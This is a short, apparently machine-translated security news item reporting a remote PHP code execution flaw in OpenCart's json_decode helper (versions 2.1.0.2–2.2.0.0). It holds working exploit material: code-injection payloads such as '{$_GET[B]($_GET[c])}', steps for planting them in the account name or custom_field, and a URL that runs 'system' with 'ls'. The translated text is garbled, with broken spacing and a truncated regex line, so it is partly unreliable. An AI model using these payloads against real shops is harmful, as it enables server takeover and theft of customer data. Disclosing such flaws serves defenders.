The OpenCartjson_decode function has the remote PHP code execution vulnerability 14:12:56 Source: 360 Security broadcast author: dark Yow reading: 103
Share:
Recently, security researchers Naser Farhadi (Twitter: @ naserfarhadi) discovered a remote PHP code execution vulnerability in the OpenCart json_decode function, involving versions 2.1.0.2 to 2.2.0.0 (latest version)
The vulnerability exists in/upload/system/helper/json. php.
#/Upload/system/helper/json. php $ match = '/".*? (?
The function is created through json, and the json_decode function can be used
Here are a few simple test examples
Var_dump (json_decode ('{"OK": "1". "2". "3 "}'));
Var_dump (json_decode ('{"OK": "$ _ SERVER [HTTP_USER_AGENT]"}');
Var_dump (json_decode ('{"OK": "{$ _ GET [B] ($ _ GET [c])}"}');
In real scenarios, you can use/index. php? Route = account/edit
For example, enter $ _ SERVER [HTTP_USER_AGENT] as the name and save it (repeat twice)
Then, when the administrator accesses the management panel, he will see his UserAgent in the area where your name should be displayed in the latest activity.
Another example is custom_field in account/edit or account/register, which may be the most suitable
If the administrator is in/admin/index. php? Route = customer/custom_field adds a custom region for additional information such as phone numbers.
You can directly inject your code in this custom_field
For example, enter {$ _ GET [B] ($ _ GET [c])} in this custom_field and save
Then access
Http: // host/shop_directory/index. php? Route = account/edit & B = system & c = ls
You will see that the code is correctly executed
Note that this method is only valid when php json extension is not installed.
This article is translated by 360 security broadcasting.